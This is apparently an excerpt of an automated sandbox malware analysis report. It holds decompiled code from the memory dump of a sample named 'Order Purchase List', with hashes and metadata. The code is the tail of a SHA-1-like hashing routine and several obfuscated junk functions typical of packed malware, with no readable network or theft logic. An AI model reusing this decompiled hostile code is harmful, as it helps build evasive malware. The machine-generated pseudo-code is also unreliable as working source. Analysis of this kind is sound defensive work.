                                      				} while (_t463 < 0x14);
                                      				_t464 = 0x14;
                                      				do {
                                      					asm("rol esi, 0x5");
                                      					asm("ror eax, 0x2");
                                      					_v16 = _t404;
                                      					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
                                      					_t334 = _v12;
                                      					_v12 = _t502;
                                      					asm("rol esi, 0x5");
                                      					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
                                      					asm("ror ebx, 0x2");
                                      					_t505 = _t279;
                                      					_v16 = _t358;
                                      					_t365 = _v12;
                                      					_v12 = _t420;
                                      					asm("rol edx, 0x5");
                                      					asm("ror ecx, 0x2");
                                      					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
                                      					_t423 = _v12;
                                      					_v8 = _t334;
                                      					_v8 = _t365;
                                      					_v12 = _t292;
                                      					asm("rol eax, 0x5");
                                      					_t464 = _t464 + 5;
                                      					_t358 = _v12;
                                      					asm("ror edx, 0x2");
                                      					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
                                      					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
                                      					_t295 = _v8;
                                      					_v8 = _t423;
                                      					_v12 = _t506;
                                      					asm("rol esi, 0x5");
                                      					_t404 = _v8;
                                      					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
                                      					_v16 = _t295;
                                      					_t279 = _v12;
                                      					asm("ror ecx, 0x2");
                                      					_v12 = _t499;
                                      				} while (_t464 < 0x28);
                                      				_v8 = 0x28;
                                      				do {
                                      					asm("rol esi, 0x5");
                                      					_v16 = _t404;
                                      					asm("ror eax, 0x2");
                                      					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
                                      					_t470 = _v12;
                                      					_v12 = _t510;
                                      					asm("rol esi, 0x5");
                                      					_t340 = _v8;
                                      					asm("ror edi, 0x2");
                                      					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
                                      					_v16 = _t358;
                                      					_t369 = _v12;
                                      					_v12 = _t432;
                                      					asm("rol edx, 0x5");
                                      					_v8 = _t279;
                                      					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
                                      					asm("ror ecx, 0x2");
                                      					_v16 = _v8;
                                      					_t299 = _v12;
                                      					_v8 = _t470;
                                      					_v12 = _t434;
                                      					asm("rol edx, 0x5");
                                      					asm("ror eax, 0x2");
                                      					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
                                      					_v16 = _v8;
                                      					_t437 = _t369;
                                      					_t358 = _v12;
                                      					_v8 = _t437;
                                      					_v12 = _t522;
                                      					asm("rol esi, 0x5");
                                      					_v16 = _v8;
                                      					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
                                      					_t404 = _t299;
                                      					_t279 = _v12;
                                      					asm("ror ecx, 0x2");
                                      					_v12 = _t499;
                                      					_t341 = _t340 + 5;
                                      					_v8 = _t341;
                                      				} while (_t341 < 0x3c);
                                      				_t478 = 0x3c;
                                      				_v8 = 0x3c;
                                      				do {
                                      					asm("rol esi, 0x5");
                                      					_t479 = _v8;
                                      					asm("ror eax, 0x2");
                                      					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
                                      					_t346 = _v12;
                                      					_v16 = _t404;
                                      					_v12 = _t525;
                                      					asm("rol esi, 0x5");
                                      					asm("ror ebx, 0x2");
                                      					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
                                      					_v16 = _t358;
                                      					_t370 = _v12;
                                      					_v12 = _t445;
                                      					asm("rol edx, 0x5");
                                      					_v16 = _t279;
                                      					asm("ror ecx, 0x2");
                                      					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
                                      					_t404 = _v12;
                                      					_v12 = _t303;
                                      					asm("rol eax, 0x5");
                                      					_v16 = _t346;
                                      					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
                                      					_t305 = _t370;
                                      					_v8 = _t346;
                                      					asm("ror edx, 0x2");
                                      					_v8 = _t370;
                                      					_t358 = _v12;
                                      					_v12 = _t532;
                                      					asm("rol esi, 0x5");
                                      					_t478 = _t479 + 5;
                                      					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
                                      					_v16 = _t305;
                                      					_t279 = _v12;
                                      					asm("ror ecx, 0x2");
                                      					_v8 = _t404;
                                      					_v12 = _t499;
                                      					_v8 = _t478;
                                      				} while (_t478 < 0x50);
                                      				_t480 = _a4;
                                      				_t480[2] = _t480[2] + _t358;
                                      				_t480[3] = _t480[3] + _t404;
                                      				_t311 = _t480[4] + _v16;
                                      				 *_t480 =  *_t480 + _t499;
                                      				_t480[1] = _t480[1] + _t279;
                                      				_t480[4] = _t311;
                                      				_t480[0x17] = 0;
                                      				return _t311;
                                      			}


                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: (
                                      • API String ID: 0-3887548279
                                      • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                      • Instruction ID: f041c125440c4280e53184c5d8a041a3e8c7322eabd03e6beab604ed3498cdf9
                                      • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                      • Instruction Fuzzy Hash: 17022DB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 56%
                                      			E0041C4BF() {
                                      				signed char _t44;
                                      				signed int _t46;
                                      				signed char _t54;
                                      				signed char _t62;
                                      				signed int _t63;
                                      				void* _t65;
                                      				void* _t66;
                                      				signed int _t69;
                                      				signed int _t70;
                                      				signed int _t75;
                                      				signed int _t77;
                                      
                                      				if((_t70 & 0x7549bfe9) > 0) {
                                      					__edi =  *0x4b6d4a7e * 0x390e;
                                      					__esi = __esi - 1;
                                      					__bl = __bl | 0x0000000c;
                                      					asm("scasb");
                                      					 *0x4f6a4f32 =  *0x4f6a4f32 + __bh;
                                      					__esi = __esi | 0x0f4e390e;
                                      					__edi = 0x86b4af0e +  *0x4b6d4a7e * 0x390e;
                                      					_pop( *0xc1b4d496);
                                      					_push(__edx);
                                      					__edx = __edx ^  *0x3af811c2;
                                      					 *0xa19c6c10 =  *0xa19c6c10 | __ch;
                                      					asm("sbb [0xa209506], esp");
                                      					__edi =  *0xd37ef26a * 0xf03;
                                      					 *0xc6e88f =  *0xc6e88f >> 0xba;
                                      					__cl = __cl -  *0xa62f35b0;
                                      					asm("adc al, [0xeaeeb322]");
                                      					__edx = __edx ^ 0x12a02dfa;
                                      					asm("sbb [0x75a0b9e3], al");
                                      					 *0xb5daa03e =  *0xb5daa03e >> 0x65;
                                      					 *0x88e992df =  *0x88e992df - __edi;
                                      					if( *0x88e992df <= 0) {
                                      						__ecx = __ecx |  *0x2217d1f3;
                                      						 *0x6ee76acd =  *0x6ee76acd >> 0xf4;
                                      						__ebp = __ebp |  *0xad084c95;
                                      						_pop(__eax);
                                      						if(__ebp <= 0) {
                                      							 *0xde305a77 =  *0xde305a77 << 0xea;
                                      							__ch = __ch + 0x3c;
                                      							__bh = __bh ^ 0x000000e2;
                                      							asm("sbb ebx, [0x3c860bc1]");
                                      							asm("movsb");
                                      							 *0x6f09c6fe =  *0x6f09c6fe >> 0xe8;
                                      							 *0x19337398 =  *0x19337398 - __esi;
                                      							__esp = __esp +  *0x1e18be13;
                                      							asm("ror byte [0x494e22b0], 0x3e");
                                      							if(__esp >=  *0x1c6bb60b) {
                                      								__ecx = __ecx |  *0xf0fc6f70;
                                      								asm("adc ebx, [0x366f0416]");
                                      								asm("ror dword [0x1409aeb], 0x17");
                                      								if(__ecx >= 0) {
                                      									__edx = __edx &  *0xd5b40c70;
                                      									if(__edi == 0) {
                                      										asm("sbb edi, [0x1be9e375]");
                                      										_t35 = __ecx;
                                      										__ecx =  *0x191f4e94;
                                      										 *0x191f4e94 = _t35;
                                      										asm("rcl dword [0xd4452625], 0x67");
                                      										__ebp = __ebp - 1;
                                      										__ecx =  *0x191f4e94 - 0xb5a4db95;
                                      										if(__ecx >= 0) {
                                      											__eax =  *0x9e46406a * 0xcb10;
                                      											asm("sbb eax, [0xb5481d1e]");
                                      											__al = __al + 0xd2;
                                      											 *0xb1e00bbf =  *0xb1e00bbf << 0x5e;
                                      											asm("cmpsw");
                                      											asm("rcl dword [0x49542d8e], 0xa8");
                                      											if( *0xb1e00bbf >= 0) {
                                      												__esi = __esi -  *0xf0fc6f70;
                                      												 *0x74b0080b = __esp;
                                      												asm("ror dword [0x4950f036], 0x9e");
                                      												if(__esi >= 0) {
                                      													 *0xf0fc6f70 = __ebx;
                                      													__ebp = __ebp +  *0xca064411;
                                      													__edi =  *0x2f00d560 * 0x361c;
                                      													asm("ror byte [0x3ce63db2], 0x1c");
                                      													asm("adc ebx, [0x8cb8f90b]");
                                      													_pop(__esi);
                                      													 *0xcf0fc6f =  *0xcf0fc6f | __ecx;
                                      													_pop(__eax);
                                      													asm("sbb ah, [0x281dfd2a]");
                                      													 *0x92cc0810 =  *0x92cc0810 - __bl;
                                      													__esp =  *0x6bed961e;
                                      													asm("adc cl, 0xa");
                                      													__esi = __edi;
                                      													__esi =  *0x3db25ff0;
                                      													asm("adc [0x870e3ce6], dl");
                                      													_push(__ebp);
                                      													__cl = __cl - 0xe2;
                                      													__ah = __ah +  *0xf5e7afe7;
                                      													asm("adc esp, [0x270b970e]");
                                      													_t40 = __dl;
                                      													__dl =  *0x5844d730;
                                      													 *0x5844d730 = _t40;
                                      													__esp =  *0x6bed961e | 0x6f704917;
                                      													 *0x351cf0fc =  *0x351cf0fc + __esi;
                                      													__eax = __eax + 1;
                                      													__bh = __bh ^  *0xa5374c1c;
                                      													__ebp =  *0xc5f8f8ff;
                                      													__edx = __edx &  *0xe16c840f;
                                      													asm("sbb esp, [0x12b62429]");
                                      													if(__edx >= 0) {
                                      														__ebx =  *0x7d20597c * 0x3c2;
                                      														 *0xaef6050e = __esi;
                                      														asm("sbb dh, [0x900d84b5]");
                                      														 *0xe7afb186 =  *0xe7afb186 - __ah;
                                      														if(__ebp >= 0) {
                                      															__esp =  *0x6b1fc670;
                                      															_push(__ebx);
                                      															_push(0x6f704913);
                                      															__esp =  *0x6b1fc670 ^  *0x670af0fc;
                                      															_push( *0xba47b0d8);
                                      															 *0x46863fb0 =  *0x46863fb0 | __al;
                                      															if( *0x46863fb0 < 0) {
                                      																 *0xb1f11071 =  *0xb1f11071 >> 0xce;
                                      																__esi = __esi + 1;
                                      																asm("sbb [0x697330bb], esi");
                                      																__esi = __esi |  *0x3d8dcb9e;
                                      																asm("adc [0xe0b4819e], ebx");
                                      																__ecx = __ecx - 1;
                                      																if(__ecx >= 0) {
                                      																	 *0xf0fc6f70 =  *0xf0fc6f70 - __ecx;
                                      																	_push( *0x38368713);
                                      																	__edi = __edi ^  *0x291879fd;
                                      																	__al = __al +  *0x3218b1b7;
                                      																	 *0x386aab0e =  *0x386aab0e & __esp;
                                      																	asm("sbb al, [0xf29d58e3]");
                                      																	__ah = __ah | 0x000000e7;
                                      																}
                                      															}
                                      														}
                                      													}
                                      												}
                                      											}
                                      										}
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      				}
                                      				L1:
                                      				_pop( *0x2a529409);
                                      				_t50 = _t50 + 0x78c1d903;
                                      				_t54 = _t54 -  *0x550d1e30;
                                      				_push(_t69);
                                      				asm("sbb bl, 0xd0");
                                      				asm("adc [0x5e9ea6c9], bl");
                                      				_t46 = _t46 &  *0xee0c8d29;
                                      				asm("adc ebx, [0x311d046c]");
                                      				asm("sbb ecx, 0xc989e08c");
                                      				asm("lodsd");
                                      				_push(_t50);
                                      				_t69 = _t69 - 1;
                                      				asm("rcl byte [0x3fbd9008], 0xe");
                                      				_t70 = _t70 - 1;
                                      				_t63 = _t63 - 0xb1242c2e;
                                      				if((_t44 & 0x1ab4b105) < 0) {
                                      					asm("sbb [0xed0dd771], edx");
                                      					 *0x98a9087 =  *0x98a9087 - _t70;
                                      					asm("adc ecx, [0xd3d3b435]");
                                      					if( *0x98a9087 <= 0) {
                                      						asm("adc [0x8d574f77], ebx");
                                      						_pop(_t69);
                                      						_push( *0x74104a36);
                                      						asm("lodsd");
                                      						_t75 = _t75 ^ 0x79383833;
                                      						asm("rcr dword [0xc5d262bf], 0x61");
                                      						asm("rol dword [0x640a03eb], 0x1e");
                                      						asm("sbb ebp, [0x76fe1429]");
                                      						asm("sbb bl, [0x711e2f82]");
                                      						_push( *0x53b27e09);
                                      						_t46 = 0x287ca813 -  *0x99051ecf;
                                      						 *0xd7ab022f =  *0xd7ab022f >> 0xe0;
                                      						_t50 = 0xa;
                                      						_t54 = ((_t54 |  *0x3fb272eb) &  *0xe555ddf2) +  *0xaf2e830b;
                                      						asm("rol byte [0xb64a5934], 0x33");
                                      						_t63 = _t63;
                                      						if(_t63 < 0) {
                                      							asm("sbb edx, [0x6aaf0a71]");
                                      							_push(0x811d5329);
                                      							_t70 = _t70 - 1;
                                      							_t69 = _t69 - 1;
                                      							if(_t69 < 0) {
                                      								_t54 = _t54 ^  *0x11030f71;
                                      								 *0x6df80ce0 =  *0x6df80ce0 + 0xa;
                                      								 *0x8de945f3 =  *0x8de945f3 ^ 0x287ca813;
                                      								_t46 = _t46 + 0xa0;
                                      								asm("rol byte [0x50590312], 0x7d");
                                      								asm("sbb dh, [0x5305c024]");
                                      								_t44 = _t44 & 0x799f3c83;
                                      								_pop(_t65);
                                      								_pop( *0xfdc51691);
                                      								 *0xb15653a9 =  *0xb15653a9 >> 0x83;
                                      								asm("sbb [0x8a15626c], eax");
                                      								_t63 = _t65 + 1;
                                      								_t50 = 0x25ce0183 +  *0x2bd1fb8f & 0x000000ca;
                                      								if(_t50 < 0) {
                                      									asm("stosb");
                                      									asm("rcl byte [0x33670730], 0x95");
                                      									 *0x614bdadb =  *0x614bdadb | _t69;
                                      									_t70 = 0x8200a671;
                                      									if( *0x614bdadb <= 0) {
                                      										 *0x962d1bf0 =  *0x962d1bf0 + 0x287ca813;
                                      										asm("adc edx, [0xe73ac826]");
                                      										 *0x2f3f1ccb =  *0x6a261e7f * 0xd13b -  *0x3509b8dc;
                                      										 *0xbd0901df =  *0xbd0901df >> 0x97;
                                      										_t77 = _t75 - 1 +  *0x9c9eb206;
                                      										_pop(_t66);
                                      										 *0xab3e2fc4 =  *0xab3e2fc4 ^ _t44;
                                      										 *0xe82cce68 =  *0xe82cce68 ^ _t70;
                                      										 *0xe3cd41ea = _t44;
                                      										_t50 = _t50 + 1;
                                      										 *0x1f4f8938 =  *0x1f4f8938 ^ _t50;
                                      										asm("rcr dword [0x3cb441f3], 0xf1");
                                      										_t63 = (_t66 - 0x00000001 |  *0xaa92b917) &  *0x48242bde;
                                      										asm("adc [0x704bccc9], cl");
                                      										 *0xec116eb6 = _t44 -  *0x4c2f0d80;
                                      										_t46 =  *0x38028e97;
                                      										_t44 =  *0xad2fb260 * 0x81d;
                                      										_push(_t77);
                                      										 *0xfe811d01 = _t70 ^ 0xca1c871b;
                                      										asm("movsw");
                                      										_t75 =  *0x312dedfd;
                                      										 *0x312dedfd = _t77;
                                      										_t69 = _t69 + 1;
                                      										 *0x38ec6138 =  *0x38ec6138 >> 0xd0;
                                      										_t62 =  *0xd4d909d1;
                                      										 *0xd4d909d1 =  *0x2f3f1ccb + 0x00000001 & 0x00000038;
                                      										 *0xb1e0c89 =  *0xb1e0c89 << 0x80;
                                      										 *0xf202931b =  *0xf202931b - _t62;
                                      										_t54 = _t62 ^ 0x000000e6;
                                      										_t70 =  *0x96049ebe;
                                      										asm("adc ecx, [0x890ef031]");
                                      										 *0xef5459e5 =  *0xef5459e5 ^ _t44;
                                      										asm("sbb eax, 0x486a0e97");
                                      										 *0xe78fc910 =  *0xe78fc910 - _t46;
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      				}
                                      				goto L1;
                                      			}
                                      0x0041c754
                                      0x0041c766
                                      0x0041c767
                                      0x0041c76d
                                      0x0041c773
                                      0x0041c77f
                                      0x0041c785
                                      0x0041c791
                                      0x0041c797
                                      0x0041c79d
                                      0x0041c79d
                                      0x0041c767
                                      0x0041c73a
                                      0x0041c716
                                      0x0041c6ee
                                      0x0041c638
                                      0x0041c61f
                                      0x0041c5f1
                                      0x0041c5d1
                                      0x0041c5bf
                                      0x0041c5a6
                                      0x0041c56c
                                      0x0041c54c
                                      0x0041b8d6
                                      0x0041b8d6
                                      0x0041b8dc
                                      0x0041b8e2
                                      0x0041b8e8
                                      0x0041b8e9
                                      0x0041b8f2
                                      0x0041b8f8
                                      0x0041b8fe
                                      0x0041b904
                                      0x0041b90a
                                      0x0041b90b
                                      0x0041b90c
                                      0x0041b90d
                                      0x0041b914
                                      0x0041b915
                                      0x0041b920
                                      0x0041b922
                                      0x0041b928
                                      0x0041b92e
                                      0x0041b934
                                      0x0041b936
                                      0x0041b942
                                      0x0041b956
                                      0x0041b95c
                                      0x0041b95d
                                      0x0041b963
                                      0x0041b970
                                      0x0041b978
                                      0x0041b97e
                                      0x0041b984
                                      0x0041b990
                                      0x0041b996
                                      0x0041b99d
                                      0x0041b99f
                                      0x0041b9a5
                                      0x0041b9ac
                                      0x0041b9ad
                                      0x0041b9b3
                                      0x0041b9b9
                                      0x0041b9be
                                      0x0041b9c2
                                      0x0041b9c3
                                      0x0041b9c9
                                      0x0041b9cf
                                      0x0041b9d5
                                      0x0041b9e1
                                      0x0041b9e4
                                      0x0041b9eb
                                      0x0041b9f7
                                      0x0041ba02
                                      0x0041ba09
                                      0x0041ba15
                                      0x0041ba22
                                      0x0041ba28
                                      0x0041ba29
                                      0x0041ba2c
                                      0x0041ba37
                                      0x0041ba38
                                      0x0041ba3f
                                      0x0041ba45
                                      0x0041ba46
                                      0x0041ba5c
                                      0x0041ba63
                                      0x0041ba69
                                      0x0041ba6f
                                      0x0041ba76
                                      0x0041ba7c
                                      0x0041ba7d
                                      0x0041ba83
                                      0x0041ba89
                                      0x0041ba8f
                                      0x0041ba90
                                      0x0041baa2
                                      0x0041babc
                                      0x0041bace
                                      0x0041bad4
                                      0x0041bad9
                                      0x0041badf
                                      0x0041baec
                                      0x0041baf3
                                      0x0041baf9
                                      0x0041bafb
                                      0x0041bafb
                                      0x0041bb02
                                      0x0041bb0f
                                      0x0041bb16
                                      0x0041bb16
                                      0x0041bb22
                                      0x0041bb2f
                                      0x0041bb35
                                      0x0041bb3e
                                      0x0041bb4a
                                      0x0041bb5c
                                      0x0041bb62
                                      0x0041bb67
                                      0x0041bb6d
                                      0x0041ba46
                                      0x0041ba2c
                                      0x0041b9c3
                                      0x0041b9ad
                                      0x0041b934
                                      0x00000000

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: Wh;
                                      • API String ID: 0-697344040
                                      • Opcode ID: 4763a07854cc698448f797b69419476a8256e98a52dfdcb2724583a36f2ea935
                                      • Instruction ID: 8baa63f0a215dff2bc4d1d5f695e2d3aff678b42749c0d4c7db6b8620fcfd669
                                      • Opcode Fuzzy Hash: 4763a07854cc698448f797b69419476a8256e98a52dfdcb2724583a36f2ea935
                                      • Instruction Fuzzy Hash: 7AD13132908384CFD716DF38C88AB853FB6F752B24B08435FD4A293591D7742696CB89
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 52%
                                      			E0041BBEA() {
                                      				signed int _t37;
                                      				signed char _t38;
                                      				void* _t40;
                                      				signed int _t41;
                                      				signed char _t49;
                                      				signed char _t57;
                                      				signed int _t58;
                                      				void* _t60;
                                      				void* _t61;
                                      				signed int _t64;
                                      				signed int _t66;
                                      				signed int _t71;
                                      				signed int _t73;
                                      
                                      				_t66 = 0x7fd092fd;
                                      				asm("cmpsw");
                                      				_t41 = _t40 -  *0x91ee20a2;
                                      				 *0x510983d2 = _t41;
                                      				_t38 = _t37 |  *0xbef9d413;
                                      				asm("sbb ecx, [0x1e19b815]");
                                      				if(_t41 >=  *0xa9b0630a) {
                                      					asm("rol dword [0x28b32770], 0xed");
                                      					__cl = __cl + 0x12;
                                      					 *0xe5177124 = __cl;
                                      					asm("sbb esp, [0xbcd2accc]");
                                      					_pop( *0xc921cb39);
                                      					asm("adc esi, 0x5693b787");
                                      					_t35 = __ecx;
                                      					__ecx =  *0xdcf947ea;
                                      					 *0xdcf947ea = _t35;
                                      					if(__cl < 0) {
                                      						__esi = __esi ^  *0xa85a7671;
                                      						 *0x531bc6bb =  *0x531bc6bb << 0x5f;
                                      						 *0x84ff6c8f =  *0x84ff6c8f | __ebx;
                                      						if( *0x84ff6c8f > 0) {
                                      							__esp =  *0xcb05f27e * 0xf74a;
                                      							if(__esp > 0) {
                                      								__ecx =  *0x2ce8717e * 0x4205;
                                      								_push(0xa79c7aba);
                                      								 *0x641c49a0 =  *0x641c49a0 >> 0xf0;
                                      								__esi = __esi ^  *0x9a0712d1;
                                      								_t36 = __bh;
                                      								__bh =  *0xc1478434;
                                      								 *0xc1478434 = _t36;
                                      								asm("rcl byte [0x55aa8cb4], 0x87");
                                      								 *0x925adcec =  *0x925adcec << 0xb1;
                                      								asm("adc ecx, 0xd102916c");
                                      								__ebx = __ebx - 1;
                                      								asm("rcl byte [0x12fd3ed0], 0xa9");
                                      								asm("sbb al, [0xce133212]");
                                      								asm("rcr dword [0x733e326e], 0xb8");
                                      								_push(0xa79c7aba);
                                      								_push(0xa79c7aba);
                                      								__eax = __eax ^  *0x7a1f1529;
                                      								 *0x781b6fff =  *0x781b6fff ^ __esi;
                                      								 *0xd85d04e1 =  *0xd85d04e1 & __dl;
                                      								L1();
                                      								asm("sbb [0x1fc2e3e8], eax");
                                      								asm("movsw");
                                      								__eax = __eax & 0x531859c8;
                                      							}
                                      						}
                                      					}
                                      				}
                                      				L1:
                                      				_pop( *0x2a529409);
                                      				_t45 = _t45 + 0x78c1d903;
                                      				_t49 = _t49 -  *0x550d1e30;
                                      				_push(_t64);
                                      				asm("sbb bl, 0xd0");
                                      				asm("adc [0x5e9ea6c9], bl");
                                      				_t41 = _t41 &  *0xee0c8d29;
                                      				asm("adc ebx, [0x311d046c]");
                                      				asm("sbb ecx, 0xc989e08c");
                                      				asm("lodsd");
                                      				_push(_t45);
                                      				_t64 = _t64 - 1;
                                      				asm("rcl byte [0x3fbd9008], 0xe");
                                      				_t66 = _t66 - 1;
                                      				_t58 = _t58 - 0xb1242c2e;
                                      				if((_t38 & 0x1ab4b105) < 0) {
                                      					asm("sbb [0xed0dd771], edx");
                                      					 *0x98a9087 =  *0x98a9087 - _t66;
                                      					asm("adc ecx, [0xd3d3b435]");
                                      					if( *0x98a9087 <= 0) {
                                      						asm("adc [0x8d574f77], ebx");
                                      						_pop(_t64);
                                      						_push( *0x74104a36);
                                      						asm("lodsd");
                                      						_t71 = _t71 ^ 0x79383833;
                                      						asm("rcr dword [0xc5d262bf], 0x61");
                                      						asm("rol dword [0x640a03eb], 0x1e");
                                      						asm("sbb ebp, [0x76fe1429]");
                                      						asm("sbb bl, [0x711e2f82]");
                                      						_push( *0x53b27e09);
                                      						_t41 = 0x287ca813 -  *0x99051ecf;
                                      						 *0xd7ab022f =  *0xd7ab022f >> 0xe0;
                                      						_t45 = 0xa;
                                      						_t49 = ((_t49 |  *0x3fb272eb) &  *0xe555ddf2) +  *0xaf2e830b;
                                      						asm("rol byte [0xb64a5934], 0x33");
                                      						_t58 = _t58;
                                      						if(_t58 < 0) {
                                      							asm("sbb edx, [0x6aaf0a71]");
                                      							_push(0x811d5329);
                                      							_t66 = _t66 - 1;
                                      							_t64 = _t64 - 1;
                                      							if(_t64 < 0) {
                                      								_t49 = _t49 ^  *0x11030f71;
                                      								 *0x6df80ce0 =  *0x6df80ce0 + 0xa;
                                      								 *0x8de945f3 =  *0x8de945f3 ^ 0x287ca813;
                                      								_t41 = _t41 + 0xa0;
                                      								asm("rol byte [0x50590312], 0x7d");
                                      								asm("sbb dh, [0x5305c024]");
                                      								_t38 = _t38 & 0x799f3c83;
                                      								_pop(_t60);
                                      								_pop( *0xfdc51691);
                                      								 *0xb15653a9 =  *0xb15653a9 >> 0x83;
                                      								asm("sbb [0x8a15626c], eax");
                                      								_t58 = _t60 + 1;
                                      								_t45 = 0x25ce0183 +  *0x2bd1fb8f & 0x000000ca;
                                      								if(_t45 < 0) {
                                      									asm("stosb");
                                      									asm("rcl byte [0x33670730], 0x95");
                                      									 *0x614bdadb =  *0x614bdadb | _t64;
                                      									_t66 = 0x8200a671;
                                      									if( *0x614bdadb <= 0) {
                                      										 *0x962d1bf0 =  *0x962d1bf0 + 0x287ca813;
                                      										asm("adc edx, [0xe73ac826]");
                                      										 *0x2f3f1ccb =  *0x6a261e7f * 0xd13b -  *0x3509b8dc;
                                      										 *0xbd0901df =  *0xbd0901df >> 0x97;
                                      										_t73 = _t71 - 1 +  *0x9c9eb206;
                                      										_pop(_t61);
                                      										 *0xab3e2fc4 =  *0xab3e2fc4 ^ _t38;
                                      										 *0xe82cce68 =  *0xe82cce68 ^ _t66;
                                      										 *0xe3cd41ea = _t38;
                                      										_t45 = _t45 + 1;
                                      										 *0x1f4f8938 =  *0x1f4f8938 ^ _t45;
                                      										asm("rcr dword [0x3cb441f3], 0xf1");
                                      										_t58 = (_t61 - 0x00000001 |  *0xaa92b917) &  *0x48242bde;
                                      										asm("adc [0x704bccc9], cl");
                                      										 *0xec116eb6 = _t38 -  *0x4c2f0d80;
                                      										_t41 =  *0x38028e97;
                                      										_t38 =  *0xad2fb260 * 0x81d;
                                      										_push(_t73);
                                      										 *0xfe811d01 = _t66 ^ 0xca1c871b;
                                      										asm("movsw");
                                      										_t71 =  *0x312dedfd;
                                      										 *0x312dedfd = _t73;
                                      										_t64 = _t64 + 1;
                                      										 *0x38ec6138 =  *0x38ec6138 >> 0xd0;
                                      										_t57 =  *0xd4d909d1;
                                      										 *0xd4d909d1 =  *0x2f3f1ccb + 0x00000001 & 0x00000038;
                                      										 *0xb1e0c89 =  *0xb1e0c89 << 0x80;
                                      										 *0xf202931b =  *0xf202931b - _t57;
                                      										_t49 = _t57 ^ 0x000000e6;
                                      										_t66 =  *0x96049ebe;
                                      										asm("adc ecx, [0x890ef031]");
                                      										 *0xef5459e5 =  *0xef5459e5 ^ _t38;
                                      										asm("sbb eax, 0x486a0e97");
                                      										 *0xe78fc910 =  *0xe78fc910 - _t41;
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      				}
                                      				goto L1;
                                      			}

















                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: Wh;
                                      • API String ID: 0-697344040
                                      • Opcode ID: 30c3cdf64a0e16891ed6ec6456ff55bd0c2f36fd265e3a2e635b707bd4d8e89b
                                      • Instruction ID: 3e9cf0f36eef0e2f9d19349e8cea96b43c9b48e6b60b1b2907ab40c45e49bfcd
                                      • Opcode Fuzzy Hash: 30c3cdf64a0e16891ed6ec6456ff55bd0c2f36fd265e3a2e635b707bd4d8e89b
                                      • Instruction Fuzzy Hash: AF914E32A18384CFD706DF39C899A813FB2F752B24B48435FD5A2931D2E738115ACB89
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 51%
                                      			E0041BB78() {
                                      				signed char _t34;
                                      				signed char _t35;
                                      				signed int _t37;
                                      				signed char _t47;
                                      				signed char _t49;
                                      				signed char _t57;
                                      				signed int _t58;
                                      				void* _t60;
                                      				void* _t61;
                                      				signed int _t64;
                                      				signed int _t65;
                                      				signed int _t66;
                                      				signed int _t71;
                                      				signed int _t73;
